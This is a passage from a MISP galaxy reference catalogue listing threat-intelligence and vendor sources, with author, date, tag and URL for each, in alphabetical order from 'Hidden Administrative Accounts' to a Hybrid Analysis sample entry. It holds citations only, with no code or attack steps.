Red Team Labs. (2018, April 24). Hidden Administrative Accounts: BloodHound to the Rescue. Retrieved October 28, 2020.

The tag is: misp-galaxy:references="CrowdStrike BloodHound April 2018"

Table 13850. Table References

Links

https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/

McAfee Bankshot

Sherstobitoff, R. (2018, March 08). Hidden Cobra Targets Turkish Financial Sector With New Bankshot Implant. Retrieved May 18, 2018.

The tag is: misp-galaxy:references="McAfee Bankshot"

Table 13851. Table References

Links

https://securingtomorrow.mcafee.com/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/

Pfammatter - Hidden Inbox Rules

Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in Microsoft Exchange. Retrieved October 12, 2021.

The tag is: misp-galaxy:references="Pfammatter - Hidden Inbox Rules"

Table 13852. Table References

Links

https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/

Intezer HiddenWasp Map 2019

Sanmillan, I. (2019, May 29). HiddenWasp Malware Stings Targeted Linux Systems. Retrieved June 24, 2019.

The tag is: misp-galaxy:references="Intezer HiddenWasp Map 2019"

Table 13853. Table References

Links

https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/

Apple Support Hide a User Account

Apple. (2020, November 30). Hide a user account in macOS. Retrieved December 10, 2021.

The tag is: misp-galaxy:references="Apple Support Hide a User Account"

Table 13854. Table References

Links

https://support.apple.com/en-us/HT203998

Malwarebytes Wow6432Node 2016

Arntz, P. (2016, March 30). Hiding in Plain Sight. Retrieved August 3, 2020.

The tag is: misp-galaxy:references="Malwarebytes Wow6432Node 2016"

Table 13855. Table References

Links

https://blog.malwarebytes.com/cybercrime/2013/10/hiding-in-plain-sight/

FireEye APT17

FireEye Labs/FireEye Threat Intelligence. (2015, May 14). Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. Retrieved January 22, 2016.

The tag is: misp-galaxy:references="FireEye APT17"

Table 13856. Table References

Links

https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf

Crowdstrike Hiding in Plain Sight 2018

Crowdstrike. (2018, July 18). Hiding in Plain Sight: Using the Office 365 Activities API to Investigate Business Email Compromises. Retrieved January 19, 2020.

The tag is: misp-galaxy:references="Crowdstrike Hiding in Plain Sight 2018"

Table 13857. Table References

Links

https://www.crowdstrike.com/blog/hiding-in-plain-sight-using-the-office-365-activities-api-to-investigate-business-email-compromises/

Hiding Malicious Code with Module Stomping

Aliz Hammond. (2019, August 15). Hiding Malicious Code with "Module Stomping": Part 1. Retrieved July 14, 2022.

The tag is: misp-galaxy:references="Hiding Malicious Code with Module Stomping"

Table 13858. Table References

Links

https://blog.f-secure.com/hiding-malicious-code-with-module-stomping/

SpectorOps Hiding Reg Jul 2017

Reitz, B. (2017, July 14). Hiding Registry keys with PSReflect. Retrieved August 9, 2018.

The tag is: misp-galaxy:references="SpectorOps Hiding Reg Jul 2017"

Table 13859. Table References

Links

https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353

FireEye SUNBURST Backdoor December 2020

FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021.

The tag is: misp-galaxy:references="FireEye SUNBURST Backdoor December 2020"

Table 13860. Table References

Links

https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html

Redirectors_Domain_Fronting

Mudge, R. (2017, February 6). High-reputation Redirectors and Domain Fronting. Retrieved July 11, 2022.

The tag is: misp-galaxy:references="Redirectors_Domain_Fronting"

Table 13861. Table References

Links

https://www.cobaltstrike.com/blog/high-reputation-redirectors-and-domain-fronting/

Synack Secure Kernel Extension Broken

Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel Extension Loading’ is Broken. Retrieved April 6, 2018.

The tag is: misp-galaxy:references="Synack Secure Kernel Extension Broken"

Table 13862. Table References

Links

https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/

Unit 42 Hildegard Malware

Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021.

The tag is: misp-galaxy:references="Unit 42 Hildegard Malware"

Table 13863. Table References

Links

https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/

Drakonia HInvoke

drakonia. (2022, August 10). HInvoke and avoiding PInvoke. Retrieved August 22, 2022.

The tag is: misp-galaxy:references="Drakonia HInvoke"

Table 13864. Table References

Links

https://dr4k0nia.github.io/dotnet/coding/2022/08/10/HInvoke-and-avoiding-PInvoke.html?s=03

microsoft_services_registry_tree

Microsoft. (2021, August 5). HKLM\SYSTEM\CurrentControlSet\Services Registry Tree. Retrieved August 25, 2021.

The tag is: misp-galaxy:references="microsoft_services_registry_tree"

Table 13865. Table References

Links

https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree

Microsoft CurrentControlSet Services

Microsoft. (2017, April 20). HKLM\SYSTEM\CurrentControlSet\Services Registry Tree. Retrieved March 16, 2020.

The tag is: misp-galaxy:references="Microsoft CurrentControlSet Services"

Table 13866. Table References

Links

https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree

Accenture Hogfish April 2018

Accenture Security. (2018, April 23). Hogfish Redleaves Campaign. Retrieved July 2, 2018.

The tag is: misp-galaxy:references="Accenture Hogfish April 2018"

Table 13867. Table References

Links

http://web.archive.org/web/20220810112638/https:/www.accenture.com/t20180423T055005Z_w/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf

Proofpoint Router Malvertising

Kafeine. (2016, December 13). Home Routers Under Attack via Malvertising on Windows, Android Devices. Retrieved January 16, 2019.

The tag is: misp-galaxy:references="Proofpoint Router Malvertising"

Table 13868. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices

Trustwave Honeypot SkidMap 2023

Radoslaw Zdonczyk. (2023, July 30). Honeypot Recon: New Variant of SkidMap Targeting Redis. Retrieved September 29, 2023.

The tag is: misp-galaxy:references="Trustwave Honeypot SkidMap 2023"

Table 13869. Table References

Links

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/honeypot-recon-new-variant-of-skidmap-targeting-redis/

Microsoft Hook Overview

Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.

The tag is: misp-galaxy:references="Microsoft Hook Overview"

Table 13870. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx

SpectorOps Host-Based Jul 2017

Atkinson, J. (2017, July 18). Host-based Threat Modeling & Indicator Design. Retrieved March 21, 2018.

The tag is: misp-galaxy:references="SpectorOps Host-Based Jul 2017"

Table 13871. Table References

Links

https://posts.specterops.io/host-based-threat-modeling-indicator-design-a9dbbb53d5ea

Crowdstrike AWS User Federation Persistence

Vaishnav Murthy and Joel Eng. (2023, January 30). How Adversaries Can Persist with AWS User Federation. Retrieved March 10, 2023.

The tag is: misp-galaxy:references="Crowdstrike AWS User Federation Persistence"

Table 13872. Table References

Links

https://www.crowdstrike.com/blog/how-adversaries-persist-with-aws-user-federation/

Andy Greenberg June 2017

Andy Greenberg. (2017, June 28). How an Entire Nation Became Russia’s Test Lab for Cyberwar. Retrieved September 27, 2023.

The tag is: misp-galaxy:references="Andy Greenberg June 2017"

Table 13873. Table References

Links

https://www.wired.com/story/russian-hackers-attack-ukraine/

Symantec Digital Certificates

Shinotsuka, H. (2013, February 22). How Attackers Steal Private Keys from Digital Certificates. Retrieved March 31, 2016.

The tag is: misp-galaxy:references="Symantec Digital Certificates"

Table 13874. Table References

Links

http://www.symantec.com/connect/blogs/how-attackers-steal-private-keys-digital-certificates

ADSecurity Silver Tickets

Sean Metcalf. (2015, November 17). How Attackers Use Kerberos Silver Tickets to Exploit Systems. Retrieved February 27, 2020.

The tag is: misp-galaxy:references="ADSecurity Silver Tickets"

Table 13875. Table References

Links

https://adsecurity.org/?p=2011

Amazon S3 Security, 2019

Amazon. (2019, May 17). How can I secure the files in my Amazon S3 bucket? Retrieved October 4, 2019.

The tag is: misp-galaxy:references="Amazon S3 Security, 2019"

Table 13876. Table References

Links

https://aws.amazon.com/premiumsupport/knowledge-center/secure-s3-resources/

Microsoft Connection Manager Oct 2009

Microsoft. (2009, October 8). How Connection Manager Works. Retrieved April 11, 2018.

The tag is: misp-galaxy:references="Microsoft Connection Manager Oct 2009"

Table 13877. Table References

Links

https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2003/cc786431(v=ws.10)

dns_changer_trojans

Abendan, O. (2012, June 14). How DNS Changer Trojans Direct Users to Threats. Retrieved October 28, 2021.

The tag is: misp-galaxy:references="dns_changer_trojans"

Table 13878. Table References

Links

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/125/how-dns-changer-trojans-direct-users-to-threats

Entrust Enable CAPI2 Aug 2017

Entrust Datacard. (2017, August 16). How do I enable CAPI 2.0 logging in Windows Vista, Windows 7 and Windows 2008 Server? Retrieved January 31, 2018.

The tag is: misp-galaxy:references="Entrust Enable CAPI2 Aug 2017"

Table 13879. Table References

Links

http://www.entrust.net/knowledge-base/technote.cfm?tn=8165

Apple Culprit Access

rjben. (2012, May 30). How do you find the culprit when unauthorized access to a computer is a problem? Retrieved August 3, 2022.

The tag is: misp-galaxy:references="Apple Culprit Access"

Table 13880. Table References

Links

https://discussions.apple.com/thread/3991574

DOJ FIN7 Aug 2018

Department of Justice. (2018, August 01). HOW FIN7 ATTACKED AND STOLE DATA. Retrieved August 24, 2018.

The tag is: misp-galaxy:references="DOJ FIN7 Aug 2018"

Table 13881. Table References

Links

https://www.justice.gov/opa/press-release/file/1084361/download

Charles McLellan March 2016

Charles McLellan. (2016, March 4). How hackers attacked Ukraine’s power grid: Implications for Industrial IoT security. Retrieved September 27, 2023.

The tag is: misp-galaxy:references="Charles McLellan March 2016"

Table 13882. Table References

Links

https://www.zdnet.com/article/how-hackers-attacked-ukraines-power-grid-implications-for-industrial-iot-security/

Cyware Social Media

Cyware Hacker News. (2019, October 2). How Hackers Exploit Social Media To Break Into Your Company. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="Cyware Social Media"

Table 13883. Table References

Links

https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e

malware_hides_service

Lawrence Abrams. (2004, September 10). How Malware hides and is installed as a Service. Retrieved August 30, 2021.

The tag is: misp-galaxy:references="malware_hides_service"

Table 13884. Table References

Links

https://www.bleepingcomputer.com/tutorials/how-malware-hides-as-a-service/

S1 macOs Persistence

Stokes, P. (2019, July 17). How Malware Persists on macOS. Retrieved March 27, 2020.

The tag is: misp-galaxy:references="S1 macOs Persistence"

Table 13885. Table References

Links

https://www.sentinelone.com/blog/how-malware-persists-on-macos/

sentinelone macos persist Jun 2019

Stokes, Phil. (2019, June 17). HOW MALWARE PERSISTS ON MACOS. Retrieved September 10, 2019.

The tag is: misp-galaxy:references="sentinelone macos persist Jun 2019"

Table 13886. Table References

Links

https://www.sentinelone.com/blog/how-malware-persists-on-macos/

Kaspersky Autofill

Golubev, S. (n.d.). How malware steals autofill data from browsers. Retrieved March 28, 2023.

The tag is: misp-galaxy:references="Kaspersky Autofill"

Table 13887. Table References

Links

https://www.kaspersky.com/blog/browser-data-theft/27871/

TheEclecticLightCompany apple notarization

How Notarization Works. (2020, August 28). How notarization works. Retrieved September 13, 2021.

The tag is: misp-galaxy:references="TheEclecticLightCompany apple notarization"

Table 13888. Table References

Links

https://eclecticlight.co/2020/08/28/how-notarization-works/

SentinelOne AppleScript

Phil Stokes. (2020, March 16). How Offensive Actors Use AppleScript For Attacking macOS. Retrieved July 17, 2020.

The tag is: misp-galaxy:references="SentinelOne AppleScript"

Table 13889. Table References

Links

https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/

SecureWorld - How Secure Is Your Slack Channel - Dec 2021

Drew Todd. (2021, December 28). How Secure Is Your Slack Channel? Retrieved May 31, 2022.

The tag is: misp-galaxy:references="SecureWorld - How Secure Is Your Slack Channel - Dec 2021"

Table 13890. Table References

Links

https://www.secureworld.io/industry-news/how-secure-is-your-slack-channel#::text=Electronic%20Arts%20hacked%20through%20Slack%20channel&text=In%20total%2C%20the%20hackers%20claim

Windows OS Hub RDP

Windows OS Hub. (2021, November 10). How to Allow Multiple RDP Sessions in Windows 10 and 11? Retrieved March 28, 2022.

The tag is: misp-galaxy:references="Windows OS Hub RDP"

Table 13891. Table References

Links

http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/

Xpn Argue Like Cobalt 2019

Chester, A. (2019, January 28). How to Argue like Cobalt Strike. Retrieved November 19, 2021.

The tag is: misp-galaxy:references="Xpn Argue Like Cobalt 2019"

Table 13892. Table References

Links

https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/

Seqrite DoubleExtension

Seqrite. (n.d.). How to avoid dual attack and vulnerable files with double extension? Retrieved July 27, 2021.

The tag is: misp-galaxy:references="Seqrite DoubleExtension"

Table 13893. Table References

Links

https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/

BOA Telephone Scams

Bank of America. (n.d.). How to avoid telephone scams. Retrieved September 8, 2023.

The tag is: misp-galaxy:references="BOA Telephone Scams"

Table 13894. Table References

Links

https://business.bofa.com/en-us/content/what-is-vishing.html

bypass_webproxy_filtering

Fehrman, B. (2017, April 13). How to Bypass Web-Proxy Filtering. Retrieved September 20, 2019.

The tag is: misp-galaxy:references="bypass_webproxy_filtering"

Table 13895. Table References

Links

https://www.blackhillsinfosec.com/bypass-web-proxy-filtering/

Systemd Remote Control

Aaron Kili. (2018, January 16). How to Control Systemd Services on Remote Linux Server. Retrieved July 26, 2021.

The tag is: misp-galaxy:references="Systemd Remote Control"

Table 13896. Table References

Links

https://www.tecmint.com/control-systemd-services-on-remote-linux-server/

Microsoft Admin Shares

Microsoft. (n.d.). How to create and delete hidden or administrative shares on client computers. Retrieved November 20, 2014.

The tag is: misp-galaxy:references="Microsoft Admin Shares"

Table 13897. Table References

Links

http://support.microsoft.com/kb/314984

Delpy Mimikatz Crendential Manager

Delpy, B. (2017, December 12). howto ~ credential manager saved credentials. Retrieved November 23, 2020.

The tag is: misp-galaxy:references="Delpy Mimikatz Crendential Manager"

Table 13898. Table References

Links

https://github.com/gentilkiwi/mimikatz/wiki/howto--credential-manager-saved-credentials

Stealthbits Overpass-the-Hash

Warren, J. (2019, February 26). How to Detect Overpass-the-Hash Attacks. Retrieved February 4, 2021.

The tag is: misp-galaxy:references="Stealthbits Overpass-the-Hash"

Table 13899. Table References

Links

https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/

Stealthbits Detect PtT 2019

Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket Attacks. Retrieved February 27, 2020.

The tag is: misp-galaxy:references="Stealthbits Detect PtT 2019"

Table 13900. Table References

Links

https://blog.stealthbits.com/detect-pass-the-ticket-attacks

WindowsIR Anti-Forensic Techniques

Carvey, H. (2013, July 23). HowTo: Determine/Detect the use of Anti-Forensics Techniques. Retrieved June 3, 2016.

The tag is: misp-galaxy:references="WindowsIR Anti-Forensic Techniques"

Table 13901. Table References

Links

http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html

Microsoft Disable Autorun

Microsoft. (n.d.). How to disable the Autorun functionality in Windows. Retrieved April 20, 2016.

The tag is: misp-galaxy:references="Microsoft Disable Autorun"

Table 13902. Table References

Links

https://support.microsoft.com/en-us/kb/967715

Superuser Linux Password Policies

Matutiae, M. (2014, August 6). How to display password policy information for a user (Ubuntu)? Retrieved April 5, 2018.

The tag is: misp-galaxy:references="Superuser Linux Password Policies"

Table 13903. Table References

Links

https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu

Confluence Linux Command Line

Confluence Support. (2021, September 8). How to enable command line audit logging in linux. Retrieved September 23, 2021.

The tag is: misp-galaxy:references="Confluence Linux Command Line"

Table 13904. Table References

Links

https://confluence.atlassian.com/confkb/how-to-enable-command-line-audit-logging-in-linux-956166545.html

Atlassian Confluence Logging

Atlassian. (2018, January 9). How to Enable User Access Logging. Retrieved April 4, 2018.

The tag is: misp-galaxy:references="Atlassian Confluence Logging"

Table 13905. Table References

Links

https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html

Remote Shell Execution in Python

Abdou Rockikz. (2020, July). How to Execute Shell Commands in a Remote Machine in Python. Retrieved July 26, 2021.

The tag is: misp-galaxy:references="Remote Shell Execution in Python"

Table 13906. Table References

Links

https://www.thepythoncode.com/article/executing-bash-commands-remotely-in-python

Find Wi-Fi Password on Mac

Ruslana Lishchuk. (2021, March 26). How to Find a Saved Wi-Fi Password on a Mac. Retrieved September 8, 2023.

The tag is: misp-galaxy:references="Find Wi-Fi Password on Mac"

Table 13907. Table References

Links

https://mackeeper.com/blog/find-wi-fi-password-on-mac/

Microsoft Web Root OCT 2016

Microsoft. (2016, October 20). How to: Find the Web Application Root. Retrieved July 27, 2018.

The tag is: misp-galaxy:references="Microsoft Web Root OCT 2016"

Microsoft Replication ACL

Microsoft. (n.d.). How to grant the "Replicating Directory Changes" permission for the Microsoft Metadirectory Services ADMA service account. Retrieved December 4, 2017.

The tag is: misp-galaxy:references="Microsoft Replication ACL"

Table 13908. Table References

Links

https://support.microsoft.com/help/303972/how-to-grant-the-replicating-directory-changes-permission-for-the-micr

Hide GDM User Accounts

Ji Mingkui. (2021, June 17). How to Hide All The User Accounts in Ubuntu 20.04, 21.04 Login Screen. Retrieved March 15, 2022.

The tag is: misp-galaxy:references="Hide GDM User Accounts"

Table 13909. Table References

Links

https://ubuntuhandbook.org/index.php/2021/06/hide-user-accounts-ubuntu-20-04-login-screen/

Elastic COM Hijacking

Ewing, P. Strom, B. (2016, September 15). How to Hunt: Detecting Persistence & Evasion with the COM. Retrieved September 15, 2016.

The tag is: misp-galaxy:references="Elastic COM Hijacking"

Table 13910. Table References

Links

https://www.elastic.co/blog/how-hunt-detecting-persistence-evasion-com

Elastic Masquerade Ball

Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball. Retrieved October 31, 2016.

The tag is: misp-galaxy:references="Elastic Masquerade Ball"

Table 13911. Table References

Links

https://www.elastic.co/blog/how-hunt-masquerade-ball

Linux Loadable Kernel Module Insert and Remove LKMs

Henderson, B. (2006, September 24). How To Insert And Remove LKMs. Retrieved April 9, 2018.

The tag is: misp-galaxy:references="Linux Loadable Kernel Module Insert and Remove LKMs"

Table 13912. Table References

Links

http://tldp.org/HOWTO/Module-HOWTO/x197.html

DigiCert Install SSL Cert

DigiCert. (n.d.). How to Install an SSL Certificate. Retrieved April 19, 2021.

The tag is: misp-galaxy:references="DigiCert Install SSL Cert"

Table 13913. Table References

Links

https://www.digicert.com/kb/ssl-certificate-installation.htm

HowToGeek ShowExtension

Chris Hoffman. (2017, March 8). How to Make Windows Show File Extensions. Retrieved August 4, 2021.

The tag is: misp-galaxy:references="HowToGeek ShowExtension"

Table 13914. Table References

Links

https://www.howtogeek.com/205086/beginner-how-to-make-windows-show-file-extensions/

Microsoft RDP Removal

Microsoft. (2021, September 24). How to remove entries from the Remote Desktop Connection Computer box. Retrieved June 15, 2022.

The tag is: misp-galaxy:references="Microsoft RDP Removal"

Table 13915. Table References

Links

https://docs.microsoft.com/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer

Startup Items Eclectic

hoakley. (2021, September 16). How to run an app or tool at startup. Retrieved October 5, 2021.

The tag is: misp-galaxy:references="Startup Items Eclectic"

Table 13916. Table References

Links

https://eclecticlight.co/2021/09/16/how-to-run-an-app-or-tool-at-startup/

Microsoft Disable VBA Jan 2020

Microsoft. (2020, January 23). How to turn off Visual Basic for Applications when you deploy Office. Retrieved September 17, 2020.

The tag is: misp-galaxy:references="Microsoft Disable VBA Jan 2020"

Table 13917. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/turn-off-visual-basic-for-application

Microsoft Regsvr32

Microsoft. (2015, August 14). How to use the Regsvr32 tool and troubleshoot Regsvr32 error messages. Retrieved June 22, 2016.

The tag is: misp-galaxy:references="Microsoft Regsvr32"

Table 13918. Table References

Links

https://support.microsoft.com/en-us/kb/249873

Microsoft SAM

Microsoft. (2006, October 30). How to use the SysKey utility to secure the Windows Security Accounts Manager database. Retrieved August 3, 2016.

The tag is: misp-galaxy:references="Microsoft SAM"

Table 13919. Table References

Links

https://support.microsoft.com/en-us/kb/310105

AWS Traffic Mirroring

Amazon Web Services. (n.d.). How Traffic Mirroring works. Retrieved March 17, 2022.

The tag is: misp-galaxy:references="AWS Traffic Mirroring"

Table 13920. Table References

Links

https://docs.aws.amazon.com/vpc/latest/mirroring/traffic-mirroring-how-it-works.html

Symantec Hydraq Persistence Jan 2010

Fitzgerald, P. (2010, January 26). How Trojan.Hydraq Stays On Your Computer. Retrieved February 22, 2018.

The tag is: misp-galaxy:references="Symantec Hydraq Persistence Jan 2010"

Table 13921. Table References

Links

https://www.symantec.com/connect/blogs/how-trojanhydraq-stays-your-computer

Microsoft UAC Nov 2018

Montemayor, D. et al. (2018, November 15). How User Account Control works. Retrieved June 3, 2019.

The tag is: misp-galaxy:references="Microsoft UAC Nov 2018"

Table 13922. Table References

Links

https://docs.microsoft.com/windows/security/identity-protection/user-account-control/how-user-account-control-works

TechNet How UAC Works

Lich, B. (2016, May 31). How User Account Control Works. Retrieved June 3, 2016.

The tag is: misp-galaxy:references="TechNet How UAC Works"

Table 13923. Table References

Links

https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works

PWC WellMess July 2020

PWC. (2020, July 16). How WellMess malware has been used to target COVID-19 vaccines. Retrieved September 24, 2020.

The tag is: misp-galaxy:references="PWC WellMess July 2020"

Table 13924. Table References

Links

https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html

Google Election Threats October 2020

Huntley, S. (2020, October 16). How We’re Tackling Evolving Online Threats. Retrieved March 24, 2021.

The tag is: misp-galaxy:references="Google Election Threats October 2020"

Table 13925. Table References

Links

https://blog.google/threat-analysis-group/how-were-tackling-evolving-online-threats/

Microsoft Credential Guard April 2017

Lich, B., Tobin, J. (2017, April 5). How Windows Defender Credential Guard works. Retrieved November 27, 2017.

The tag is: misp-galaxy:references="Microsoft Credential Guard April 2017"

Table 13926. Table References

Links

https://docs.microsoft.com/windows/access-protection/credential-guard/credential-guard-how-it-works

NPPSPY Video

Grzegorz Tworek. (2021, December 14). How winlogon.exe shares the cleartext password with custom DLLs. Retrieved March 30, 2023.

The tag is: misp-galaxy:references="NPPSPY Video"

Table 13927. Table References

Links

https://www.youtube.com/watch?v=ggY3srD9dYs

Cylance Sodinokibi July 2019

Cylance. (2019, July 3). Threat Spotlight: Sodinokibi Ransomware. Retrieved August 4, 2020.

The tag is: misp-galaxy:references="Cylance Sodinokibi July 2019"

Table 13928. Table References

Links

https://threatvector.cylance.com/en_us/home/threat-spotlight-sodinokibi-ransomware.html

Wikipedia HTML Application

Wikipedia. (2017, October 14). HTML Application. Retrieved October 27, 2017.

The tag is: misp-galaxy:references="Wikipedia HTML Application"

Table 13929. Table References

Links

https://en.wikipedia.org/wiki/HTML_Application

MSDN HTML Applications

Microsoft. (n.d.). HTML Applications. Retrieved October 27, 2017.

The tag is: misp-galaxy:references="MSDN HTML Applications"

Table 13930. Table References

Links

https://msdn.microsoft.com/library/ms536471.aspx

Microsoft HTML Help ActiveX

Microsoft. (n.d.). HTML Help ActiveX Control Overview. Retrieved October 3, 2018.

The tag is: misp-galaxy:references="Microsoft HTML Help ActiveX"

Table 13931. Table References

Links

https://msdn.microsoft.com/windows/desktop/ms644670

Outlflank HTML Smuggling 2018

Hegt, S. (2018, August 14). HTML smuggling explained. Retrieved May 20, 2021.

The tag is: misp-galaxy:references="Outlflank HTML Smuggling 2018"

Table 13932. Table References

Links

https://outflank.nl/blog/2018/08/14/html-smuggling-explained/

CrowdStrike Linux Rootkit

Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit. Retrieved December 21, 2017.

The tag is: misp-galaxy:references="CrowdStrike Linux Rootkit"

Table 13933. Table References

Links

https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/

Wikipedia HPKP

Wikipedia. (2017, February 28). HTTP Public Key Pinning. Retrieved March 31, 2017.

The tag is: misp-galaxy:references="Wikipedia HPKP"

Table 13934. Table References

Links

https://en.wikipedia.org/wiki/HTTP_Public_Key_Pinning

Cobalt Strike Arguments 2019

Mudge, R. (2019, January 2). https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/. Retrieved November 19, 2021.

The tag is: misp-galaxy:references="Cobalt Strike Arguments 2019"

Table 13935. Table References

Links

https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/

Talos Discord Webhook Abuse

Nick Biasini, Edmund Brumaghin, Chris Neal, and Paul Eubanks. (2021, April 7). https://blog.talosintelligence.com/collab-app-abuse/. Retrieved July 20, 2023.

The tag is: misp-galaxy:references="Talos Discord Webhook Abuse"

Table 13936. Table References

Links

https://blog.talosintelligence.com/collab-app-abuse/

Red Canary Emotet Feb 2019

Donohue, B. (2019, February 13). https://redcanary.com/blog/stopping-emotet-before-it-moves-laterally/. Retrieved March 25, 2019.

The tag is: misp-galaxy:references="Red Canary Emotet Feb 2019"

Table 13937. Table References

Links

https://redcanary.com/blog/stopping-emotet-before-it-moves-laterally/

TechNet Removable Media Control

Microsoft. (2007, August 31). https://technet.microsoft.com/en-us/library/cc771759(v=ws.10).aspx. Retrieved April 20, 2016.

The tag is: misp-galaxy:references="TechNet Removable Media Control"

Table 13938. Table References

Links

https://technet.microsoft.com/en-us/library/cc772540(v=ws.10).aspx

Chromium HSTS

Chromium. (n.d.). HTTP Strict Transport Security. Retrieved May 24, 2023.

The tag is: misp-galaxy:references="Chromium HSTS"

Table 13939. Table References

Links

https://www.chromium.org/hsts/

CISA AA20-301A Kimsuky

CISA, FBI, CNMF. (2020, October 27). https://us-cert.cisa.gov/ncas/alerts/aa20-301a. Retrieved November 4, 2020.

The tag is: misp-galaxy:references="CISA AA20-301A Kimsuky"

Table 13940. Table References

Links

https://us-cert.cisa.gov/ncas/alerts/aa20-301a

FireEye Targeted Attacks Middle East Banks

Singh, S., Yin, H. (2016, May 22). https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html. Retrieved April 5, 2018.

The tag is: misp-galaxy:references="FireEye Targeted Attacks Middle East Banks"

Table 13941. Table References

Links

https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html

Microsoft Subscription Hijacking 2022

Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.

The tag is: misp-galaxy:references="Microsoft Subscription Hijacking 2022"

Table 13943. Table References

Links

https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121

crowdstrike bpf socket filters

Jamie Harries. (2022, May 25). Hunting a Global Telecommunications Threat: DecisiveArchitect and Its Custom Implant JustForFun. Retrieved October 18, 2022.

The tag is: misp-galaxy:references="crowdstrike bpf socket filters"

Table 13944. Table References

Links

https://www.crowdstrike.com/blog/how-to-hunt-for-decisivearchitect-and-justforfun-implant/

Koczwara Beacon Hunting Sep 2021

Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.

The tag is: misp-galaxy:references="Koczwara Beacon Hunting Sep 2021"

Table 13945. Table References

Links

https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2

Fireeye Hunting COM June 2019

Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June 10, 2019.

The tag is: misp-galaxy:references="Fireeye Hunting COM June 2019"

Table 13946. Table References

Links

https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html

Berba hunting linux systemd

Pepe Berba. (2022, January 30). Hunting for Persistence in Linux (Part 3): Systemd, Timers, and Cron. Retrieved March 20, 2023.

The tag is: misp-galaxy:references="Berba hunting linux systemd"

Table 13947. Table References

Links

https://pberba.github.io/security/2022/01/30/linux-threat-hunting-for-persistence-systemd-timers-cron/

Elastic HuntingNMemory June 2017

Desimone, J. (2017, June 13). Hunting in Memory. Retrieved December 7, 2017.

The tag is: misp-galaxy:references="Elastic HuntingNMemory June 2017"

Table 13948. Table References

Links

https://www.endgame.com/blog/technical-blog/hunting-memory

LogPoint Hunting LockBit

LogPoint. (n.d.). Hunting LockBit Variations using Logpoint. Retrieved May 19, 2023.

The tag is: misp-galaxy:references="LogPoint Hunting LockBit"

Table 13949. Table References

Links

https://www.logpoint.com/wp-content/uploads/2022/10/hunting-lockbit-variations-using-logpoint-.pdf

Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023

FBI et al. (2023, May 9). Hunting Russian Intelligence “Snake” Malware. Retrieved June 8, 2023.

The tag is: misp-galaxy:references="Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023"

Table 13950. Table References

Links

https://www.cisa.gov/sites/default/files/2023-05/aa23-129a_snake_malware_2.pdf

Falcon Sandbox smp: 28553b3a9d

Hybrid Analysis. (2018, July 11). Hybrid Analysis of sample 28553b3a9d2ad4361d33d29ac4bf771d008e0073cec01b5561c6348a608f8dd7. Retrieved September 8, 2023.

The tag is: misp-galaxy:references="Falcon Sandbox smp: 28553b3a9d"

Table 13951. Table References

Links

